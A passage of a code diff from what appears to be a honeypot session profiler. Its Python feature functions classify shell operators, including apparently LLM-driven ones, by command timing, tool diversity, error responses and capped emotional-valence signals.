TOOL_VOCAB_BROAD_MIN,
TOOL_VOCAB_NARROW_MAX,
)
# Hashes of the help-family first tokens, computed once at import time
# so the per-session hot loop does a set-membership check instead of
# three hash computations per command.  The ``--help`` / ``-h`` flag
# forms cannot be detected here: they are not first tokens, and PII
# discipline keeps only the *first* token's hash.  v0.2 will reconsider
# once corpus calibration justifies storing arg-token hashes too.
_HELP_FAMILY_HASHES: frozenset[str] = frozenset(
    hash_token(token) for token in ("man", "help", "info")
)
def _clip01(x: float) -> float:
if x < 0.0:
return 0.0
if x > 1.0:
return 1.0
return x
def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
"""Coefficient of variation; ``None`` if undefined (n<2 or mean==0)."""
if len(xs) < 2:
return None
mean = statistics.fmean(xs)
if mean <= 0.0:
return None
return statistics.stdev(xs) / mean
def _bucket_inter_cmd_latency(median_iat: float) -> str:
    """Map a median inter-command gap to its latency-class label.

    The thresholds are checked in the order listed and each is an
    inclusive upper bound; the first one that ``median_iat`` does not
    exceed decides the label.  Anything above the last threshold is
    ``"long"``.
    """
    ladder = (
        (INTER_CMD_INSTANT_MAX, "instant"),
        (INTER_CMD_TYPING_MAX, "typing_speed"),
        (INTER_CMD_DELIBERATE_MAX, "deliberate"),
        (INTER_CMD_LLM_LIGHTWEIGHT_MAX, "llm_lightweight"),
        (INTER_CMD_LLM_HEAVYWEIGHT_MAX, "llm_heavyweight"),
    )
    for ceiling, label in ladder:
        if median_iat <= ceiling:
            return label
    return "long"
def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_latency_class``.

    Buckets the operator's *thinking pace* — the median gap between
    commands — against calibrated thresholds.  Splits LW-sim /
    CLAUDE-FF / CLAUDE-CL.

    Nothing is emitted when the session has no inter-command gaps.
    Sample-size honesty: confidence is 0.80 with at least
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands and halved to 0.40
    below that.
    """
    gaps = ctx.inter_cmd_iats
    if not gaps:
        return

    enough_commands = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_latency_class",
        value=_bucket_inter_cmd_latency(statistics.median(gaps)),
        confidence=0.80 if enough_commands else 0.40,
    )
def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.command_branch_diversity``.

    Content-based discriminator (no timing): the ratio of distinct
    first-token hashes to total commands.  Splits CLAUDE-FF
    (``linear_playbook``) from CLAUDE-CL (``adaptive_branching``).  The
    empirical anchor on 2026-05-02: fire-and-forget runs ~10 distinct
    tools; closed-loop runs 5-6 with ``curl`` re-invoked as the operator
    chases threads.

    Emission rules:

    * no commands — nothing is emitted;
    * fewer than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands —
      ``unknown`` at confidence 1.0 (the registry admits ``unknown``,
      and lacking enough data is itself a high-confidence answer);
    * otherwise — ``linear_playbook`` when the ratio reaches
      ``BRANCH_DIVERSITY_LINEAR_MIN``, else ``adaptive_branching``
      (tool reuse is the discriminative signal), at confidence 0.80.
    """
    total = len(ctx.commands)
    if total == 0:
        return

    if total < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        label, confidence = "unknown", 1.0
    else:
        distinct = len({cmd.first_token_hash for cmd in ctx.commands})
        is_linear = distinct / total >= BRANCH_DIVERSITY_LINEAR_MIN
        label = "linear_playbook" if is_linear else "adaptive_branching"
        confidence = 0.80

    yield make_observation(
        ctx,
        primitive="cognitive.command_branch_diversity",
        value=label,
        confidence=confidence,
    )
def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.feedback_loop_engagement``.

    Pearson correlation between ``output_per_cmd[i]`` (bytes the
    operator saw before the next command) and ``inter_cmd_iats[i]`` (the
    pause that followed).  ``closed_loop`` operators read more before
    pausing more; ``fire_and_forget`` operators pace independently of
    output.  CUTS ACROSS the LLM/human axis — closed-loop LLMs and
    reading humans both score ``closed_loop``.

    Emission rules:

    * no output events, or fewer than ``FEEDBACK_MIN_PAIRS`` pairs —
      ``unknown`` at confidence 1.0 (no honest correlation possible),
      unless the session has no commands at all, in which case nothing
      is emitted;
    * correlation undefined (``statistics.StatisticsError``, e.g. a
      constant series on either axis) — ``unknown`` at confidence 1.0;
    * otherwise — ``closed_loop`` when the correlation exceeds
      ``FEEDBACK_CORRELATION_MIN``, else ``fire_and_forget``, at
      confidence 0.75.
    """
    primitive = "cognitive.feedback_loop_engagement"

    def _unknown() -> Observation:
        return make_observation(
            ctx, primitive=primitive, value="unknown", confidence=1.0,
        )

    samples = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
    if not ctx.output_events or len(samples) < FEEDBACK_MIN_PAIRS:
        if ctx.commands:
            yield _unknown()
        return

    bytes_seen = [float(sample[0]) for sample in samples]
    pauses = [float(sample[1]) for sample in samples]
    try:
        r = statistics.correlation(bytes_seen, pauses)
    except statistics.StatisticsError:
        yield _unknown()
        return

    yield make_observation(
        ctx,
        primitive=primitive,
        value="closed_loop" if r > FEEDBACK_CORRELATION_MIN else "fire_and_forget",
        confidence=0.75,
    )
def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.fallback_to_man``.

    Looks at the command immediately after every errored command. If any
    such follow-up has a ``first_token_hash`` in ``_HELP_FAMILY_HASHES``
    the value is ``present``; otherwise it is ``absent``. An errored
    command that is last in the session has no follow-up and cannot
    count towards ``present``.

    Nothing is emitted when no command errored. Confidence is 0.40 while
    the number of errored commands is below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` and 0.65 otherwise.
    """
    commands = ctx.commands
    failed_at = [idx for idx, cmd in enumerate(commands) if cmd.errored]
    if not failed_at:
        return

    final_index = len(commands) - 1
    reached_for_help = any(
        idx < final_index
        and commands[idx + 1].first_token_hash in _HELP_FAMILY_HASHES
        for idx in failed_at
    )

    well_sampled = len(failed_at) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.fallback_to_man",
        value="present" if reached_for_help else "absent",
        confidence=0.65 if well_sampled else 0.40,
    )
def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.frustration_typing``.

    For every command after the first, takes the median of its
    intra-command IATs and files it under "previous command errored" or
    "previous command succeeded". The reported value is based on the
    relative gap between the medians of those two groups,
    ``abs(err - ok) / ok``:

    * below ``FRUSTRATION_LOW_MAX`` → ``low``
    * below ``FRUSTRATION_MODERATE_MAX`` → ``moderate``
    * otherwise → ``high``

    Nothing is emitted when there are fewer than two commands, when
    ``ctx.intra_command_iats`` does not line up one-to-one with
    ``ctx.commands``, when either group is empty, or when the
    post-success median is not positive. Confidence is 0.40 while the
    post-error group is smaller than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE``
    and 0.60 otherwise.
    """
    commands = ctx.commands
    per_cmd_iats = ctx.intra_command_iats
    if len(commands) < 2 or len(per_cmd_iats) != len(commands):
        return

    after_failure: list[float] = []
    after_success: list[float] = []
    for idx in range(1, len(commands)):
        keystroke_gaps = per_cmd_iats[idx]
        if not keystroke_gaps:
            continue
        bucket = after_failure if commands[idx - 1].errored else after_success
        bucket.append(statistics.median(keystroke_gaps))

    if not (after_failure and after_success):
        return

    failure_median = statistics.median(after_failure)
    baseline_median = statistics.median(after_success)
    if baseline_median <= 0.0:
        # Relative change is meaningless against a non-positive baseline.
        return

    relative_shift = abs(failure_median - baseline_median) / baseline_median
    if relative_shift < FRUSTRATION_LOW_MAX:
        level = "low"
    elif relative_shift < FRUSTRATION_MODERATE_MAX:
        level = "moderate"
    else:
        level = "high"

    well_sampled = len(after_failure) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.frustration_typing",
        value=level,
        confidence=0.60 if well_sampled else 0.40,
    )
def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.retry_tactic``.

    Each errored command is classified by what came next:

    * ``rerun`` — the next command has the same ``first_token_hash``.
    * ``switch`` — the next command has a different ``first_token_hash``.
    * ``abort`` — there is no next command.

    The most frequent response across all errored commands is reported.
    Ties resolve in the order rerun, switch, abort. ``modify`` is never
    produced by this function.

    Nothing is emitted when no command errored. Confidence is 0.40 while
    the number of errored commands is below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` and 0.65 otherwise.
    """
    commands = ctx.commands
    failures = [(pos, cmd) for pos, cmd in enumerate(commands) if cmd.errored]
    if not failures:
        return

    # Insertion order doubles as the tie-break order used by ``max`` below.
    tally = {"rerun": 0, "switch": 0, "abort": 0}
    final_index = len(commands) - 1
    for pos, failed in failures:
        if pos >= final_index:
            response = "abort"
        elif commands[pos + 1].first_token_hash == failed.first_token_hash:
            response = "rerun"
        else:
            response = "switch"
        tally[response] += 1

    # ``max`` keeps the first key it sees among equal counts.
    dominant = max(tally, key=tally.get)

    well_sampled = len(failures) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.retry_tactic",
        value=dominant,
        confidence=0.65 if well_sampled else 0.40,
    )
def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.

    Counts the distinct ``first_token_hash`` values across the session's
    commands. A count at or below ``TOOL_VOCAB_NARROW_MAX`` is
    ``narrow``, at or above ``TOOL_VOCAB_BROAD_MIN`` is ``broad``, and
    anything in between is ``moderate``.

    Nothing is emitted for a session with no commands. Confidence is
    0.40 while the command count is below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` and 0.70 otherwise.
    """
    commands = ctx.commands
    if not commands:
        return

    tool_count = len({cmd.first_token_hash for cmd in commands})
    # The narrow test is evaluated first, as in the threshold ordering.
    breadth = (
        "narrow"
        if tool_count <= TOOL_VOCAB_NARROW_MAX
        else "broad"
        if tool_count >= TOOL_VOCAB_BROAD_MIN
        else "moderate"
    )

    well_sampled = len(commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.tool_vocabulary",
        value=breadth,
        confidence=0.70 if well_sampled else 0.40,
    )
def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.

    Classifies the session from the share of inter-command IATs that
    fall into two bands:

    * ``deep`` — the fraction of pauses longer than ``IKI_THINK_MAX_S``
      reaches ``PLANNING_DEEP_MIN``.
    * ``reactive`` — otherwise, the fraction of pauses no longer than
      ``INTER_CMD_INSTANT_MAX`` reaches ``PLANNING_REACTIVE_MIN``.
    * ``shallow`` — neither condition holds.

    Nothing is emitted when ``ctx.inter_cmd_iats`` is empty. Confidence
    is 0.40 while the command count is below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` and 0.65 otherwise.
    """
    pauses = ctx.inter_cmd_iats
    if not pauses:
        return

    total = len(pauses)
    think_share = len([p for p in pauses if p > IKI_THINK_MAX_S]) / total
    instant_share = len([p for p in pauses if p <= INTER_CMD_INSTANT_MAX]) / total

    # "deep" takes precedence over "reactive" when both thresholds are met.
    if think_share >= PLANNING_DEEP_MIN:
        depth = "deep"
    elif instant_share >= PLANNING_REACTIVE_MIN:
        depth = "reactive"
    else:
        depth = "shallow"

    well_sampled = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.planning_depth",
        value=depth,
        confidence=0.65 if well_sampled else 0.40,
    )
def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.

    Two rates are computed over the sequence of ``first_token_hash``
    values:

    * **repetition rate** — ``1 - unique / n``.
    * **backtrack rate** — share of command-to-command transitions that
      land on a hash already seen earlier in the session but different
      from the immediately preceding one. Repeating the predecessor is
      covered by the repetition rate instead.

    Classification, in priority order:

    * ``chaotic`` — backtrack rate ≥ ``EXPLORATION_CHAOTIC_BACKTRACK_MIN``.
    * ``targeted`` — repetition rate ≥ ``EXPLORATION_TARGETED_REP_MIN``.
    * ``methodical`` — neither.

    Nothing is emitted for a session with no commands. Confidence is
    0.40 while the command count is below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` and 0.60 otherwise.
    """
    n = len(ctx.commands)
    if n == 0:
        return

    hashes = [c.first_token_hash for c in ctx.commands]
    # n > 0 is guaranteed by the guard above, so no zero-division fallback.
    repetition_rate = 1.0 - (len(set(hashes)) / n)

    seen_before: set[str] = {hashes[0]}
    backtracks = 0
    for previous, current in zip(hashes, hashes[1:]):
        # ``current != previous`` plus membership means the earlier
        # sighting was before the immediate predecessor: a non-local jump.
        if current != previous and current in seen_before:
            backtracks += 1
        seen_before.add(current)

    # A single-command session has no transitions; its rate is 0.0.
    transitions = n - 1
    backtrack_rate = (backtracks / transitions) if transitions else 0.0

    if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
        value = "chaotic"
    elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
        value = "targeted"
    else:
        value = "methodical"

    if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.60
    yield make_observation(
        ctx,
        primitive="cognitive.exploration_style",
        value=value,
        confidence=confidence,
    )
def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.

    The load score is the mean of up to three sub-signals, each passed
    through ``_clip01``:

    * **chunking** — median of the per-command ``_cv`` values of
      ``ctx.intra_command_iats``, divided by
      ``COGNITIVE_LOAD_CHUNKING_REF_CV``. Left out when no command
      yields a CV.
    * **errors** — fraction of commands with ``errored`` set. Always
      present.
    * **pace variability** — ``_cv`` of ``ctx.inter_cmd_iats`` divided
      by ``COGNITIVE_LOAD_PACE_REF_CV``. Left out when ``_cv`` returns
      ``None``.

    A missing sub-signal is excluded from the mean, not counted as
    zero. A score below ``COGNITIVE_LOAD_LOW_MAX`` is ``low``, below
    ``COGNITIVE_LOAD_MEDIUM_MAX`` is ``medium``, otherwise ``high``.

    Nothing is emitted for a session with no commands. Confidence is
    0.40 while the command count is below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` and 0.60 otherwise.
    """
    commands = ctx.commands
    if not commands:
        return

    # Collected in a fixed order: chunking, errors, pace.
    signals: list[float] = []

    within_cmd_cvs = [
        cv for cv in map(_cv, ctx.intra_command_iats) if cv is not None
    ]
    if within_cmd_cvs:
        signals.append(
            _clip01(
                statistics.median(within_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
            )
        )

    failed = len([cmd for cmd in commands if cmd.errored])
    signals.append(_clip01(failed / len(commands)))

    pace_cv = _cv(ctx.inter_cmd_iats)
    if pace_cv is not None:
        signals.append(_clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV))

    score = sum(signals) / len(signals)
    if score < COGNITIVE_LOAD_LOW_MAX:
        level = "low"
    elif score < COGNITIVE_LOAD_MEDIUM_MAX:
        level = "medium"
    else:
        level = "high"

    well_sampled = len(commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.cognitive_load",
        value=level,
        confidence=0.60 if well_sampled else 0.40,
    )
def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_consistency``.

    Uses the coefficient of variation (sample stdev / mean) of
    ``ctx.inter_cmd_iats``:

    * ``metronomic`` — CV below ``PAUSE_CV_METRONOMIC_MAX``.
    * ``bimodal`` — CV at or above ``PAUSE_CV_BIMODAL_MIN``.
    * ``variable`` — anything in between.

    Only the CV is consulted; no modality test is performed here.

    Nothing is emitted with fewer than two IATs or a non-positive mean.
    Confidence is 0.40 while the command count is below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` and 0.75 otherwise.
    """
    gaps = ctx.inter_cmd_iats
    if len(gaps) < 2:
        return

    average = statistics.fmean(gaps)
    if average <= 0.0:
        return

    spread = statistics.stdev(gaps) / average
    # The metronomic test is evaluated first, then bimodal.
    rhythm = (
        "metronomic"
        if spread < PAUSE_CV_METRONOMIC_MAX
        else "bimodal"
        if spread >= PAUSE_CV_BIMODAL_MIN
        else "variable"
    )

    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        certainty = 0.40
    else:
        certainty = 0.75
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_consistency",
        value=rhythm,
        confidence=certainty,
    )

View File

@@ -1,223 +0,0 @@
"""``emotional_valence.*`` feature functions (Phase G, soft block).
All four primitives in this module ride a hard 0.5 confidence cap
(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
the feature functions, *not* via :func:`make_observation` — sample-size
honesty may still pull confidence below 0.5.
Step G.5: ``emotional_valence.valence``.
Step G.6: ``emotional_valence.arousal``.
Step G.7: ``emotional_valence.stress_response``.
Step G.8: ``emotional_valence.frustration_venting``.
"""
from __future__ import annotations
import statistics
from typing import Iterator
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features._emit import make_observation
from decnet.profiler.behave_shell._thresholds import (
AROUSAL_BANG_RUN_MIN,
AROUSAL_CALM_IAT_S,
AROUSAL_CAPS_RUN_MIN,
AROUSAL_FAST_IAT_S,
AROUSAL_MIN_IATS,
EMOTIONAL_VALENCE_CONFIDENCE_CAP,
FRUST_VENT_FULL_CONFIDENCE_MIN,
FRUST_VENT_MIN_TYPED_CHARS,
STRESS_DISTRESS_RATIO_MIN,
STRESS_EUSTRESS_RATIO_MIN,
STRESS_MIN_ERRORED_WITH_IATS,
VALENCE_FULL_CONFIDENCE_MIN,
VALENCE_MIN_HITS,
VALENCE_MIN_TYPED_CHARS,
)
def _cap_soft(c: float) -> float:
    """Return ``c`` limited to ``EMOTIONAL_VALENCE_CONFIDENCE_CAP``."""
    ceiling = EMOTIONAL_VALENCE_CONFIDENCE_CAP
    # Written so the ceiling wins only when it is strictly smaller,
    # matching ``min(c, ceiling)``.
    return ceiling if ceiling < c else c
def valence(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.

    Compares ``ctx.positive_lex_hits`` against the sum of
    ``ctx.negative_lex_hits`` and ``ctx.obscenity_hits``:

    * ``positive`` — positive hits strictly exceed the negative total
      and reach ``VALENCE_MIN_HITS``.
    * ``negative`` — the negative total strictly exceeds positive hits
      and reaches ``VALENCE_MIN_HITS``.
    * ``neutral`` — everything else, including ties.

    Nothing is emitted when ``ctx.typed_letter_count`` is below
    ``VALENCE_MIN_TYPED_CHARS``. Raw confidence is 0.50 at or above
    ``VALENCE_FULL_CONFIDENCE_MIN`` typed letters and 0.30 below it; it
    is then passed through ``_cap_soft``.
    """
    typed = ctx.typed_letter_count
    if typed < VALENCE_MIN_TYPED_CHARS:
        return

    upbeat = ctx.positive_lex_hits
    downbeat = ctx.negative_lex_hits + ctx.obscenity_hits

    mood = "neutral"
    if upbeat > downbeat:
        if upbeat >= VALENCE_MIN_HITS:
            mood = "positive"
    elif downbeat > upbeat and downbeat >= VALENCE_MIN_HITS:
        mood = "negative"

    if typed >= VALENCE_FULL_CONFIDENCE_MIN:
        raw = 0.50
    else:
        raw = 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.valence",
        value=mood,
        confidence=_cap_soft(raw),
    )
def arousal(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
    high_agitated}.

    Only typing bursts with at least three IATs are considered. From
    those, the function takes the smallest and largest per-burst median
    IAT and the total IAT count across all of them.

    * ``high_agitated`` — any of: ``ctx.caps_run_max`` reaches
      ``AROUSAL_CAPS_RUN_MIN``; ``ctx.bang_run_max`` reaches
      ``AROUSAL_BANG_RUN_MIN``; or the total IAT count reaches
      ``AROUSAL_MIN_IATS`` and the smallest median is below
      ``AROUSAL_FAST_IAT_S``.
    * ``low_calm`` — otherwise, the total IAT count reaches
      ``AROUSAL_MIN_IATS`` and the largest median exceeds
      ``AROUSAL_CALM_IAT_S``.
    * ``medium_engaged`` — fall-through.

    Nothing is emitted when no burst qualifies. Raw confidence is 0.50
    when the total IAT count reaches ``AROUSAL_MIN_IATS`` and 0.30
    otherwise; it is then passed through ``_cap_soft``.
    """
    bursts = [burst for burst in ctx.typing_bursts if len(burst) >= 3]
    if not bursts:
        return

    medians = [statistics.median(burst) for burst in bursts]
    quickest = min(medians)
    slowest = max(medians)
    well_sampled = sum(map(len, bursts)) >= AROUSAL_MIN_IATS

    # Lexical signals fire regardless of how much timing data exists.
    shouting = (
        ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
        or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
    )
    if shouting or (well_sampled and quickest < AROUSAL_FAST_IAT_S):
        level = "high_agitated"
    elif well_sampled and slowest > AROUSAL_CALM_IAT_S:
        level = "low_calm"
    else:
        level = "medium_engaged"

    yield make_observation(
        ctx,
        primitive="emotional_valence.arousal",
        value=level,
        confidence=_cap_soft(0.50 if well_sampled else 0.30),
    )
def stress_response(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.stress_response`` ∈ {none,
    eustress_positive, distress_negative}.

    Splits intra-command IATs into two pools:

    * **post-error** — IATs of every command whose immediate predecessor
      errored.
    * **baseline** — IATs of every other command, including the first.

    A command with no entry in ``ctx.intra_command_iats`` contributes
    nothing to either pool.

    Verdict by ``median(post-error) / median(baseline)``:

    * ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` → ``eustress_positive``
      (typing slowed after errors).
    * ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
      (typing sped up after errors).
    * otherwise → ``none``. This also covers an empty pool and a
      non-positive baseline median.

    Nothing is emitted for a session with no commands. Raw confidence is
    0.50 when at least ``STRESS_MIN_ERRORED_WITH_IATS`` post-error
    commands carried IAT data and 0.30 otherwise; it is then passed
    through ``_cap_soft``.
    """
    commands = ctx.commands
    if not commands:
        return

    per_cmd_iats = ctx.intra_command_iats
    post_error_iats: list[float] = []
    baseline_iats: list[float] = []
    qualifying_errored = 0
    for i in range(len(commands)):
        # Tolerate an IAT table shorter than the command list.
        iats = list(per_cmd_iats[i]) if i < len(per_cmd_iats) else []
        if i > 0 and commands[i - 1].errored:
            if iats:
                qualifying_errored += 1
                post_error_iats.extend(iats)
        else:
            baseline_iats.extend(iats)

    value = "none"
    if post_error_iats and baseline_iats:
        med_post = statistics.median(post_error_iats)
        med_base = statistics.median(baseline_iats)
        if med_base > 0.0:
            ratio = med_post / med_base
            if ratio >= STRESS_EUSTRESS_RATIO_MIN:
                value = "eustress_positive"
            elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
                value = "distress_negative"

    raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.stress_response",
        value=value,
        confidence=_cap_soft(raw),
    )
def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.

    Reads ``ctx.obscenity_hits`` directly: one or more hits is
    ``detected``, zero is ``none``.

    Nothing is emitted when ``ctx.typed_letter_count`` is below
    ``FRUST_VENT_MIN_TYPED_CHARS``. Raw confidence, before
    ``_cap_soft``:

    * 0.40 for ``detected``;
    * 0.50 for ``none`` with at least
      ``FRUST_VENT_FULL_CONFIDENCE_MIN`` typed letters;
    * 0.30 for ``none`` below that count.
    """
    typed = ctx.typed_letter_count
    if typed < FRUST_VENT_MIN_TYPED_CHARS:
        return

    if ctx.obscenity_hits >= 1:
        verdict, raw = "detected", 0.40
    elif typed >= FRUST_VENT_FULL_CONFIDENCE_MIN:
        verdict, raw = "none", 0.50
    else:
        verdict, raw = "none", 0.30

    yield make_observation(
        ctx,
        primitive="emotional_valence.frustration_venting",
        value=verdict,
        confidence=_cap_soft(raw),
    )

Some files were not shown because too many files have changed in this diff Show More